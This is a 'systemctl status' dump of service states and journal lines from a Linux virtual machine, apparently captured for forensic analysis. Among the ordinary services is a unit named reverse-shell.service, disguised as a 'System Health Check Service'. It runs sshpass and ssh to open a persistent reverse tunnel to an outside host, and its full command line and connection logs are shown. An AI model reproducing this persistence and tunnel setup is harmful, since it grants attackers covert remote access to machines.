systemctl status --type=service --no-pager > services.txt

● accounts-daemon.service - Accounts Service
     Loaded: loaded (/usr/lib/systemd/system/accounts-daemon.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
   Main PID: 1204 (accounts-daemon)
      Tasks: 4 (limit: 9377)
     Memory: 5.8M (peak: 7.6M)
        CPU: 141ms
     CGroup: /system.slice/accounts-daemon.service
             └─1204 /usr/libexec/accounts-daemon

Sep 16 19:17:23 dfa systemd[1]: Starting accounts-daemon.service - Accounts Service...
Sep 16 19:17:23 dfa accounts-daemon[1204]: started daemon version 23.13.9
Sep 16 19:17:23 dfa systemd[1]: Started accounts-daemon.service - Accounts Service.

● alsa-restore.service - Save/Restore Sound Card State
     Loaded: loaded (/usr/lib/systemd/system/alsa-restore.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:24 MSK; 25min ago
       Docs: man:alsactl(1)
   Main PID: 1405 (code=exited, status=0/SUCCESS)
        CPU: 10ms

Sep 16 19:17:24 dfa systemd[1]: Starting alsa-restore.service - Save/Restore Sound Card State...
Sep 16 19:17:24 dfa alsactl[1405]: alsa-lib main.c:1554:(snd_use_case_mgr_open) error: failed to import hw:0 use case configuration -2
Sep 16 19:17:24 dfa systemd[1]: Finished alsa-restore.service - Save/Restore Sound Card State.

● apparmor.service - Load AppArmor profiles
     Loaded: loaded (/usr/lib/systemd/system/apparmor.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: man:apparmor(7)
             https://gitlab.com/apparmor/apparmor/wikis/home/
   Main PID: 506 (code=exited, status=0/SUCCESS)
        CPU: 293ms

Sep 16 19:17:20 dfa apparmor.systemd[506]: Restarting AppArmor
Sep 16 19:17:20 dfa apparmor.systemd[506]: Reloading AppArmor profiles
Sep 16 19:17:20 dfa systemd[1]: Starting apparmor.service - Load AppArmor profiles...
Sep 16 19:17:20 dfa apparmor.systemd[719]: Warning: found usr.sbin.sssd in /etc/apparmor.d/force-complain, forcing complain mode
Sep 16 19:17:20 dfa apparmor.systemd[719]: Warning from /etc/apparmor.d (/etc/apparmor.d/usr.sbin.sssd line 63): Caching disabled for: 'usr.sbin.sssd' due to force complain
Sep 16 19:17:20 dfa systemd[1]: Finished apparmor.service - Load AppArmor profiles.

● apport.service - automatic crash report generation
     Loaded: loaded (/usr/lib/systemd/system/apport.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:23 MSK; 25min ago
   Main PID: 1154 (code=exited, status=0/SUCCESS)
        CPU: 221ms

Sep 16 19:17:23 dfa systemd[1]: Starting apport.service - automatic crash report generation...
Sep 16 19:17:23 dfa systemd[1]: Finished apport.service - automatic crash report generation.

● avahi-daemon.service - Avahi mDNS/DNS-SD Stack
     Loaded: loaded (/usr/lib/systemd/system/avahi-daemon.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
TriggeredBy: ● avahi-daemon.socket
   Main PID: 1158 (avahi-daemon)
     Status: "avahi-daemon 0.8 starting up."
      Tasks: 2 (limit: 9377)
     Memory: 1.9M (peak: 2.2M)
        CPU: 473ms
     CGroup: /system.slice/avahi-daemon.service
             ├─1158 "avahi-daemon: running [dfa.local]"
             └─1236 "avahi-daemon: chroot helper"

Sep 16 19:17:23 dfa avahi-daemon[1158]: Registering new address record for ::1 on lo.*.
Sep 16 19:17:23 dfa avahi-daemon[1158]: Registering new address record for 127.0.0.1 on lo.IPv4.
Sep 16 19:17:23 dfa systemd[1]: Started avahi-daemon.service - Avahi mDNS/DNS-SD Stack.
Sep 16 19:17:24 dfa avahi-daemon[1158]: Server startup complete. Host name is dfa.local. Local service cookie is 1016477117.
Sep 16 19:17:25 dfa avahi-daemon[1158]: Joining mDNS multicast group on interface ens33.IPv4 with address 192.168.21.128.
Sep 16 19:17:26 dfa avahi-daemon[1158]: New relevant interface ens33.IPv4 for mDNS.
Sep 16 19:17:26 dfa avahi-daemon[1158]: Registering new address record for 192.168.21.128 on ens33.IPv4.
Sep 16 19:17:27 dfa avahi-daemon[1158]: Joining mDNS multicast group on interface ens33.IPv6 with address fe80::20c:29ff:fe16:b2d0.
Sep 16 19:17:27 dfa avahi-daemon[1158]: New relevant interface ens33.IPv6 for mDNS.
Sep 16 19:17:27 dfa avahi-daemon[1158]: Registering new address record for fe80::20c:29ff:fe16:b2d0 on ens33.*.

● bluetooth.service - Bluetooth service
     Loaded: loaded (/usr/lib/systemd/system/bluetooth.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
       Docs: man:bluetoothd(8)
   Main PID: 1159 (bluetoothd)
     Status: "Running"
      Tasks: 1 (limit: 9377)
     Memory: 3.2M (peak: 3.5M)
        CPU: 35ms
     CGroup: /system.slice/bluetooth.service
             └─1159 /usr/libexec/bluetooth/bluetoothd

Sep 16 19:17:23 dfa bluetoothd[1159]: Starting SDP server
Sep 16 19:17:23 dfa bluetoothd[1159]: src/plugin.c:plugin_init() System does not support csip plugin
Sep 16 19:17:23 dfa bluetoothd[1159]: profiles/audio/micp.c:micp_init() D-Bus experimental not enabled
Sep 16 19:17:23 dfa bluetoothd[1159]: src/plugin.c:plugin_init() System does not support micp plugin
Sep 16 19:17:23 dfa bluetoothd[1159]: src/plugin.c:plugin_init() System does not support vcp plugin
Sep 16 19:17:23 dfa bluetoothd[1159]: src/plugin.c:plugin_init() System does not support mcp plugin
Sep 16 19:17:23 dfa bluetoothd[1159]: src/plugin.c:plugin_init() System does not support bass plugin
Sep 16 19:17:23 dfa bluetoothd[1159]: src/plugin.c:plugin_init() System does not support bap plugin
Sep 16 19:17:23 dfa bluetoothd[1159]: Bluetooth management interface 1.23 initialized
Sep 16 19:17:23 dfa systemd[1]: Started bluetooth.service - Bluetooth service.

● colord.service - Manage, Install and Generate Color Profiles
     Loaded: loaded (/usr/lib/systemd/system/colord.service; static)
     Active: active (running) since Tue 2025-09-16 19:17:27 MSK; 25min ago
   Main PID: 1855 (colord)
      Tasks: 4 (limit: 9377)
     Memory: 23.3M (peak: 29.2M)
        CPU: 1.179s
     CGroup: /system.slice/colord.service
             └─1855 /usr/libexec/colord

Sep 16 19:17:27 dfa systemd[1]: Starting colord.service - Manage, Install and Generate Color Profiles...
Sep 16 19:17:27 dfa colord[1855]: failed to get edid data: EDID length is too small
Sep 16 19:17:27 dfa systemd[1]: Started colord.service - Manage, Install and Generate Color Profiles.

● console-setup.service - Set console font and keymap
     Loaded: loaded (/usr/lib/systemd/system/console-setup.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
   Main PID: 454 (code=exited, status=0/SUCCESS)
        CPU: 7ms

Sep 16 19:17:20 dfa systemd[1]: Finished console-setup.service - Set console font and keymap.

● cron.service - Regular background program processing daemon
     Loaded: loaded (/usr/lib/systemd/system/cron.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
       Docs: man:cron(8)
   Main PID: 1205 (cron)
      Tasks: 1 (limit: 9377)
     Memory: 468.0K (peak: 2.3M)
        CPU: 37ms
     CGroup: /system.slice/cron.service
             └─1205 /usr/sbin/cron -f -P

Sep 16 19:17:23 dfa cron[1205]: (CRON) INFO (Running @reboot jobs)
Sep 16 19:25:01 dfa CRON[3301]: pam_unix(cron:session): session opened for user root(uid=0) by root(uid=0)
Sep 16 19:25:01 dfa CRON[3302]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Sep 16 19:25:01 dfa CRON[3301]: pam_unix(cron:session): session closed for user root
Sep 16 19:30:01 dfa CRON[4068]: pam_unix(cron:session): session opened for user root(uid=0) by root(uid=0)
Sep 16 19:30:01 dfa CRON[4069]: (root) CMD ([ -x /etc/init.d/anacron ] && if [ ! -d /run/systemd/system ]; then /usr/sbin/invoke-rc.d anacron start >/dev/null; fi)
Sep 16 19:30:01 dfa CRON[4068]: pam_unix(cron:session): session closed for user root
Sep 16 19:35:01 dfa CRON[4414]: pam_unix(cron:session): session opened for user root(uid=0) by root(uid=0)
Sep 16 19:35:01 dfa CRON[4415]: (root) CMD (command -v debian-sa1 > /dev/null && debian-sa1 1 1)
Sep 16 19:35:01 dfa CRON[4414]: pam_unix(cron:session): session closed for user root

● cups-browsed.service - Make remote CUPS printers available locally
     Loaded: loaded (/usr/lib/systemd/system/cups-browsed.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:26 MSK; 25min ago
   Main PID: 1499 (cups-browsed)
      Tasks: 4 (limit: 9377)
     Memory: 9.9M (peak: 10.3M)
        CPU: 64ms
     CGroup: /system.slice/cups-browsed.service
             └─1499 /usr/sbin/cups-browsed

Sep 16 19:17:26 dfa systemd[1]: Started cups-browsed.service - Make remote CUPS printers available locally.

● cups.service - CUPS Scheduler
     Loaded: loaded (/usr/lib/systemd/system/cups.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:25 MSK; 25min ago
TriggeredBy: ● cups.socket
             ● cups.path
       Docs: man:cupsd(8)
   Main PID: 1463 (cupsd)
     Status: "Scheduler is running..."
      Tasks: 1 (limit: 9377)
     Memory: 5.6M (peak: 5.9M)
        CPU: 37ms
     CGroup: /system.slice/cups.service
             └─1463 /usr/sbin/cupsd -l

Sep 16 19:17:25 dfa systemd[1]: Starting cups.service - CUPS Scheduler...
Sep 16 19:17:25 dfa systemd[1]: Started cups.service - CUPS Scheduler.

● dbus.service - D-Bus System Message Bus
     Loaded: loaded (/usr/lib/systemd/system/dbus.service; static)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
TriggeredBy: ● dbus.socket
       Docs: man:dbus-daemon(1)
   Main PID: 1163 (dbus-daemon)
      Tasks: 1 (limit: 9377)
     Memory: 4.9M (peak: 5.0M)
        CPU: 548ms
     CGroup: /system.slice/dbus.service
             └─1163 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

Sep 16 19:17:29 dfa dbus-daemon[1163]: [system] Activating via systemd: service name='org.freedesktop.locale1' unit='dbus-org.freedesktop.locale1.service' requested by ':1.67' (uid=1000 pid=1960 comm="/usr/libexec/gsd-keyboard" label="unconfined")
Sep 16 19:17:29 dfa dbus-daemon[1163]: [system] Successfully activated service 'org.freedesktop.locale1'
Sep 16 19:22:25 dfa dbus-daemon[1163]: [system] Activating via systemd: service name='org.freedesktop.timedate1' unit='dbus-org.freedesktop.timedate1.service' requested by ':1.19' (uid=0 pid=1201 comm="/usr/lib/snapd/snapd" label="unconfined")
Sep 16 19:22:25 dfa dbus-daemon[1163]: [system] Successfully activated service 'org.freedesktop.timedate1'
Sep 16 19:25:59 dfa dbus-daemon[1163]: [system] Activating via systemd: service name='org.freedesktop.PackageKit' unit='packagekit.service' requested by ':1.87' (uid=0 pid=3481 comm="/usr/bin/gdbus call --system --dest org.freedeskto" label="unconfined")
Sep 16 19:25:59 dfa dbus-daemon[1163]: [system] Successfully activated service 'org.freedesktop.PackageKit'
Sep 16 19:32:24 dfa dbus-daemon[1163]: [system] Activating via systemd: service name='org.freedesktop.nm_dispatcher' unit='dbus-org.freedesktop.nm-dispatcher.service' requested by ':1.14' (uid=0 pid=1240 comm="/usr/sbin/NetworkManager --no-daemon" label="unconfined")
Sep 16 19:32:24 dfa dbus-daemon[1163]: [system] Successfully activated service 'org.freedesktop.nm_dispatcher'
Sep 16 19:33:05 dfa dbus-daemon[1163]: [system] Activating via systemd: service name='org.freedesktop.PackageKit' unit='packagekit.service' requested by ':1.94' (uid=0 pid=4347 comm="/usr/bin/gdbus call --system --dest org.freedeskto" label="unconfined")
Sep 16 19:33:05 dfa dbus-daemon[1163]: [system] Successfully activated service 'org.freedesktop.PackageKit'

● gdm.service - GNOME Display Manager
     Loaded: loaded (/usr/lib/systemd/system/gdm.service; static)
     Active: active (running) since Tue 2025-09-16 19:17:25 MSK; 25min ago
   Main PID: 1481 (gdm3)
      Tasks: 4 (limit: 9377)
     Memory: 6.0M (peak: 8.1M)
        CPU: 101ms
     CGroup: /system.slice/gdm.service
             └─1481 /usr/sbin/gdm3

Sep 16 19:17:25 dfa systemd[1]: Starting gdm.service - GNOME Display Manager...
Sep 16 19:17:25 dfa systemd[1]: Started gdm.service - GNOME Display Manager.
Sep 16 19:17:25 dfa gdm-autologin][1489]: gkr-pam: no password is available for user
Sep 16 19:17:25 dfa gdm-autologin][1489]: pam_unix(gdm-autologin:session): session opened for user dfa(uid=1000) by dfa(uid=0)
Sep 16 19:17:26 dfa gdm-autologin][1489]: gkr-pam: couldn't unlock the login keyring.
Sep 16 19:17:26 dfa gdm3[1481]: Gdm: on_display_added: assertion 'GDM_IS_REMOTE_DISPLAY (display)' failed
Sep 16 19:17:26 dfa gdm3[1481]: Gdm: on_display_removed: assertion 'GDM_IS_REMOTE_DISPLAY (display)' failed

● gnome-remote-desktop.service - GNOME Remote Desktop
     Loaded: loaded (/usr/lib/systemd/system/gnome-remote-desktop.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
   Main PID: 1171 (gnome-remote-de)
      Tasks: 4 (limit: 9377)
     Memory: 8.5M (peak: 9.0M)
        CPU: 60ms
     CGroup: /system.slice/gnome-remote-desktop.service
             └─1171 /usr/libexec/gnome-remote-desktop-daemon --system

Sep 16 19:17:23 dfa systemd[1]: Starting gnome-remote-desktop.service - GNOME Remote Desktop...
Sep 16 19:17:23 dfa gnome-remote-de[1171]: Init TPM credentials failed because No TPM device found, using GKeyFile as fallback
Sep 16 19:17:23 dfa systemd[1]: Started gnome-remote-desktop.service - GNOME Remote Desktop.
Sep 16 19:17:25 dfa gnome-remote-de[1171]: Error calling GetManagedObjects() when name owner :1.22 for name org.gnome.DisplayManager came back: GDBus.Error:org.freedesktop.DBus.Error.UnknownMethod: Object does not exist at path “/org/gnome/DisplayManager/Displays”

● kerneloops.service - Tool to automatically collect and submit kernel crash signatures
     Loaded: loaded (/usr/lib/systemd/system/kerneloops.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:26 MSK; 25min ago
      Tasks: 2 (limit: 9377)
     Memory: 1.4M (peak: 2.4M)
        CPU: 27ms
     CGroup: /system.slice/kerneloops.service
             ├─1502 /usr/sbin/kerneloops --test
             └─1513 /usr/sbin/kerneloops

Sep 16 19:17:26 dfa systemd[1]: Starting kerneloops.service - Tool to automatically collect and submit kernel crash signatures...
Sep 16 19:17:26 dfa systemd[1]: kerneloops.service: Found left-over process 1502 (kerneloops) in control group while starting unit. Ignoring.
Sep 16 19:17:26 dfa systemd[1]: kerneloops.service: This usually indicates unclean termination of a previous run, or service implementation deficiencies.
Sep 16 19:17:26 dfa (rneloops)[1503]: kerneloops.service: Referenced but unset environment variable evaluates to an empty string: DAEMON_ARGS
Sep 16 19:17:26 dfa systemd[1]: Started kerneloops.service - Tool to automatically collect and submit kernel crash signatures.

● keyboard-setup.service - Set the console keyboard layout
     Loaded: loaded (/usr/lib/systemd/system/keyboard-setup.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
   Main PID: 400 (code=exited, status=0/SUCCESS)
        CPU: 46ms

Notice: journal has been rotated since unit was started, output may be incomplete.

● kmod-static-nodes.service - Create List of Static Device Nodes
     Loaded: loaded (/usr/lib/systemd/system/kmod-static-nodes.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
   Main PID: 401 (code=exited, status=0/SUCCESS)
        CPU: 6ms

Notice: journal has been rotated since unit was started, output may be incomplete.

● ModemManager.service - Modem Manager
     Loaded: loaded (/usr/lib/systemd/system/ModemManager.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
   Main PID: 1292 (ModemManager)
      Tasks: 4 (limit: 9377)
     Memory: 7.5M (peak: 7.9M)
        CPU: 78ms
     CGroup: /system.slice/ModemManager.service
             └─1292 /usr/sbin/ModemManager

Sep 16 19:17:23 dfa systemd[1]: Starting ModemManager.service - Modem Manager...
Sep 16 19:17:23 dfa ModemManager[1292]: <msg> ModemManager (version 1.23.4) starting in system bus...
Sep 16 19:17:23 dfa systemd[1]: Started ModemManager.service - Modem Manager.
Sep 16 19:17:27 dfa ModemManager[1292]: <msg> [base-manager] couldn't check support for device '/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0': not supported by any plugin

● NetworkManager-wait-online.service - Network Manager Wait Online
     Loaded: loaded (/usr/lib/systemd/system/NetworkManager-wait-online.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:26 MSK; 25min ago
       Docs: man:NetworkManager-wait-online.service(8)
   Main PID: 1411 (code=exited, status=0/SUCCESS)
        CPU: 12ms

Sep 16 19:17:25 dfa systemd[1]: Starting NetworkManager-wait-online.service - Network Manager Wait Online...
Sep 16 19:17:26 dfa systemd[1]: Finished NetworkManager-wait-online.service - Network Manager Wait Online.

● NetworkManager.service - Network Manager
     Loaded: loaded (/usr/lib/systemd/system/NetworkManager.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:24 MSK; 25min ago
       Docs: man:NetworkManager(8)
   Main PID: 1240 (NetworkManager)
      Tasks: 4 (limit: 9377)
     Memory: 17.0M (peak: 32.9M)
        CPU: 1.777s
     CGroup: /system.slice/NetworkManager.service
             └─1240 /usr/sbin/NetworkManager --no-daemon

Sep 16 19:17:25 dfa NetworkManager[1240]: <info>  [1758039445.9460] policy: set 'netplan-ens33' (ens33) as default for IPv4 routing and DNS
Sep 16 19:17:26 dfa NetworkManager[1240]: <info>  [1758039446.1540] device (ens33): state change: ip-config -> ip-check (reason 'none', sys-iface-state: 'managed')
Sep 16 19:17:26 dfa NetworkManager[1240]: <info>  [1758039446.1566] device (ens33): state change: ip-check -> secondaries (reason 'none', sys-iface-state: 'managed')
Sep 16 19:17:26 dfa NetworkManager[1240]: <info>  [1758039446.1568] device (ens33): state change: secondaries -> activated (reason 'none', sys-iface-state: 'managed')
Sep 16 19:17:26 dfa NetworkManager[1240]: <info>  [1758039446.1570] manager: NetworkManager state is now CONNECTED_SITE
Sep 16 19:17:26 dfa NetworkManager[1240]: <info>  [1758039446.1571] device (ens33): Activation: successful, device activated.
Sep 16 19:17:26 dfa NetworkManager[1240]: <info>  [1758039446.1573] manager: startup complete
Sep 16 19:17:26 dfa NetworkManager[1240]: <info>  [1758039446.3023] manager: NetworkManager state is now CONNECTED_GLOBAL
Sep 16 19:17:29 dfa NetworkManager[1240]: <info>  [1758039449.3005] agent-manager: agent[4156decee76af538,:1.41/org.gnome.Shell.NetworkAgent/1000]: agent registered
Sep 16 19:32:24 dfa NetworkManager[1240]: <info>  [1758040344.2068] dhcp4 (ens33): state changed new lease, address=192.168.21.128

● open-vm-tools.service - Service for virtual machines hosted on VMware
     Loaded: loaded (/usr/lib/systemd/system/open-vm-tools.service; enabled; preset: enabled)
    Drop-In: /usr/lib/systemd/system/open-vm-tools.service.d
             └─desktop.conf
     Active: active (running) since Tue 2025-09-16 19:17:20 MSK; 25min ago
       Docs: http://open-vm-tools.sourceforge.net/about.php
   Main PID: 756 (vmtoolsd)
      Tasks: 4 (limit: 9377)
     Memory: 5.4M (peak: 6.1M)
        CPU: 2.607s
     CGroup: /system.slice/open-vm-tools.service
             └─756 /usr/bin/vmtoolsd

Sep 16 19:17:20 dfa systemd[1]: Starting open-vm-tools.service - Service for virtual machines hosted on VMware...
Sep 16 19:17:20 dfa systemd[1]: Started open-vm-tools.service - Service for virtual machines hosted on VMware.

● openvpn.service - OpenVPN service
     Loaded: loaded (/usr/lib/systemd/system/openvpn.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:25 MSK; 25min ago
       Docs: man:openvpn(8)
   Main PID: 1464 (code=exited, status=0/SUCCESS)
        CPU: 5ms

Sep 16 19:17:25 dfa systemd[1]: Starting openvpn.service - OpenVPN service...
Sep 16 19:17:25 dfa systemd[1]: Finished openvpn.service - OpenVPN service.

● plymouth-quit-wait.service - Hold until boot process finishes up
     Loaded: loaded (/usr/lib/systemd/system/plymouth-quit-wait.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:46 MSK; 25min ago
   Main PID: 1475 (code=exited, status=0/SUCCESS)
        CPU: 6ms

Sep 16 19:17:25 dfa systemd[1]: Starting plymouth-quit-wait.service - Hold until boot process finishes up...
Sep 16 19:17:46 dfa systemd[1]: Finished plymouth-quit-wait.service - Hold until boot process finishes up.

● plymouth-read-write.service - Tell Plymouth To Write Out Runtime Data
     Loaded: loaded (/usr/lib/systemd/system/plymouth-read-write.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
   Main PID: 455 (code=exited, status=0/SUCCESS)
        CPU: 5ms

Sep 16 19:17:20 dfa systemd[1]: Finished plymouth-read-write.service - Tell Plymouth To Write Out Runtime Data.

● plymouth-start.service - Show Plymouth Boot Screen
     Loaded: loaded (/usr/lib/systemd/system/plymouth-start.service; static)
     Active: active (exited) since Tue 2025-09-16 19:17:20 MSK; 25min ago
        CPU: 12ms

Sep 16 19:17:20 dfa systemd[1]: Starting plymouth-start.service - Show Plymouth Boot Screen...
Sep 16 19:17:20 dfa systemd[1]: Started plymouth-start.service - Show Plymouth Boot Screen.

● polkit.service - Authorization Manager
     Loaded: loaded (/usr/lib/systemd/system/polkit.service; static)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
       Docs: man:polkit(8)
   Main PID: 1189 (polkitd)
      Tasks: 4 (limit: 9377)
     Memory: 6.3M (peak: 6.7M)
        CPU: 274ms
     CGroup: /system.slice/polkit.service
             └─1189 /usr/lib/polkit-1/polkitd --no-debug

Sep 16 19:17:23 dfa polkitd[1189]: Loading rules from directory /etc/polkit-1/rules.d
Sep 16 19:17:23 dfa polkitd[1189]: Loading rules from directory /usr/share/polkit-1/rules.d
Sep 16 19:17:23 dfa polkitd[1189]: Finished loading, compiling and executing 16 rules
Sep 16 19:17:23 dfa polkitd[1189]: Acquired the name org.freedesktop.PolicyKit1 on the system bus
Sep 16 19:17:23 dfa systemd[1]: Started polkit.service - Authorization Manager.
Sep 16 19:17:29 dfa polkitd[1189]: Registered Authentication Agent for unix-session:1 (system bus name :1.41 [/usr/bin/gnome-shell], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_US.UTF-8)
Sep 16 19:22:32 dfa polkitd[1189]: Registered Authentication Agent for unix-process:3222:31626 (system bus name :1.83 [/usr/bin/pkttyagent --notify-fd 5 --fallback], object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_US.UTF-8)
Sep 16 19:22:32 dfa polkitd[1189]: Identity `unix-group:admin' is not valid, ignoring: No UNIX group with name admin: No such file or directory
Sep 16 19:22:34 dfa polkitd[1189]: Operator of unix-session:1 successfully authenticated as unix-user:dfa to gain TEMPORARY authorization for action org.freedesktop.systemd1.manage-units for system-bus-name::1.84 [systemctl start reverse-shell.service] (owned by unix-user:dfa)
Sep 16 19:22:38 dfa polkitd[1189]: Unregistered Authentication Agent for unix-process:unknown (system bus name :1.83, object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_US.UTF-8) (disconnected from bus)

● power-profiles-daemon.service - Power Profiles daemon
     Loaded: loaded (/usr/lib/systemd/system/power-profiles-daemon.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
   Main PID: 1192 (power-profiles-)
      Tasks: 4 (limit: 9377)
     Memory: 2.3M (peak: 2.7M)
        CPU: 53ms
     CGroup: /system.slice/power-profiles-daemon.service
             └─1192 /usr/libexec/power-profiles-daemon

Sep 16 19:17:23 dfa systemd[1]: Starting power-profiles-daemon.service - Power Profiles daemon...
Sep 16 19:17:23 dfa systemd[1]: Started power-profiles-daemon.service - Power Profiles daemon.

● reverse-shell.service - System Health Check Service
     Loaded: loaded (/etc/systemd/system/reverse-shell.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:31:21 MSK; 11min ago
   Main PID: 4226 (sshpass)
      Tasks: 2 (limit: 9377)
     Memory: 1.5M (peak: 2.0M)
        CPU: 13ms
     CGroup: /system.slice/reverse-shell.service
             ├─4226 /usr/bin/sshpass -e /usr/bin/ssh -v -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ServerAliveInterval=60 -N -T -R 2222:localhost:22 gangster@gangsterito.ru
             └─4227 /usr/bin/ssh -v -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ServerAliveInterval=60 -N -T -R 2222:localhost:22 gangster@gangsterito.ru

Sep 16 19:31:21 dfa sshpass[4227]: debug1: Authentications that can continue: publickey,password,keyboard-interactive
Sep 16 19:31:21 dfa sshpass[4227]: debug1: Next authentication method: password
Sep 16 19:31:21 dfa sshpass[4227]: Authenticated to gangsterito.ru ([194.87.103.48]:22) using "password".
Sep 16 19:31:21 dfa sshpass[4227]: debug1: Remote connections from LOCALHOST:2222 forwarded to local address localhost:22
Sep 16 19:31:21 dfa sshpass[4227]: debug1: Requesting no-more-sessions@openssh.com
Sep 16 19:31:21 dfa sshpass[4227]: debug1: Entering interactive session.
Sep 16 19:31:21 dfa sshpass[4227]: debug1: pledge: network
Sep 16 19:31:21 dfa sshpass[4227]: debug1: pledge: network
Sep 16 19:31:21 dfa sshpass[4227]: debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
Sep 16 19:31:21 dfa sshpass[4227]: debug1: remote forward success for: listen 2222, connect localhost:22

● rsyslog.service - System Logging Service
     Loaded: loaded (/usr/lib/systemd/system/rsyslog.service; enabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:23 MSK; 25min ago
TriggeredBy: ● syslog.socket
       Docs: man:rsyslogd(8)
             man:rsyslog.conf(5)
             https://www.rsyslog.com/doc/
   Main PID: 1254 (rsyslogd)
      Tasks: 4 (limit: 9377)
     Memory: 3.8M (peak: 5.1M)
        CPU: 192ms
     CGroup: /system.slice/rsyslog.service
             └─1254 /usr/sbin/rsyslogd -n -iNONE

Sep 16 19:17:23 dfa systemd[1]: Starting rsyslog.service - System Logging Service...
Sep 16 19:17:23 dfa rsyslogd[1254]: imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd.  [v8.2312.0]
Sep 16 19:17:23 dfa rsyslogd[1254]: rsyslogd's groupid changed to 102
Sep 16 19:17:23 dfa rsyslogd[1254]: rsyslogd's userid changed to 102
Sep 16 19:17:23 dfa rsyslogd[1254]: [origin software="rsyslogd" swVersion="8.2312.0" x-pid="1254" x-info="https://www.rsyslog.com"] start
Sep 16 19:17:23 dfa systemd[1]: Started rsyslog.service - System Logging Service.

● rtkit-daemon.service - RealtimeKit Scheduling Policy Service
     Loaded: loaded (/usr/lib/systemd/system/rtkit-daemon.service; disabled; preset: enabled)
     Active: active (running) since Tue 2025-09-16 19:17:26 MSK; 25min ago
   Main PID: 1558 (rtkit-daemon)
      Tasks: 3 (limit: 9377)
     Memory: 700.0K (peak: 1.4M)
        CPU: 36ms
     CGroup: /system.slice/rtkit-daemon.service
             └─1558 /usr/libexec/rtkit-daemon

Sep 16 19:17:27 dfa rtkit-daemon[1558]: Supervising 8 threads of 5 processes of 1 users.
Sep 16 19:17:29 dfa rtkit-daemon[1558]: Successfully made thread 1778 of process 1716 owned by '1000' high priority at nice level 0.
Sep 16 19:17:29 dfa rtkit-daemon[1558]: Supervising 8 threads of 5 processes of 1 users.
Sep 16 19:17:29 dfa rtkit-daemon[1558]: Supervising 7 threads of 4 processes of 1 users.
Sep 16 19:17:29 dfa rtkit-daemon[1558]: Supervising 7 threads of 4 processes of 1 users.
Sep 16 19:17:29 dfa rtkit-daemon[1558]: Successfully made thread 1778 of process 1716 owned by '1000' RT at priority 20.
Sep 16 19:17:29 dfa rtkit-daemon[1558]: Supervising 8 threads of 5 processes of 1 users.
Sep 16 19:17:30 dfa rtkit-daemon[1558]: Supervising 8 threads of 5 processes of 1 users.
Sep 16 19:17:30 dfa rtkit-daemon[1558]: Supervising 8 threads of 5 processes of 1 users.
Sep 16 19:17:30 dfa rtkit-daemon[1558]: Supervising 8 threads of 5 processes of 1 users.

● setvtrgb.service - Set console scheme
     Loaded: loaded (/usr/lib/systemd/system/setvtrgb.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:46 MSK; 25min ago
   Main PID: 2624 (code=exited, status=0/SUCCESS)
        CPU: 1ms

Sep 16 19:17:46 dfa systemd[1]: Starting setvtrgb.service - Set console scheme...
Sep 16 19:17:46 dfa systemd[1]: Finished setvtrgb.service - Set console scheme.

● snapd.apparmor.service - Load AppArmor profiles managed internally by snapd
     Loaded: loaded (/usr/lib/systemd/system/snapd.apparmor.service; enabled; preset: enabled)
     Active: active (exited) since Tue 2025-09-16 19:17:23 MSK; 25min ago
   Main PID: 745 (code=exited, status=0/SUCCESS)
        CPU: 417ms

Sep 16 19:17:20 dfa systemd[1]: Starting snapd.apparmor.service - Load AppArmor profiles managed internally by snapd...
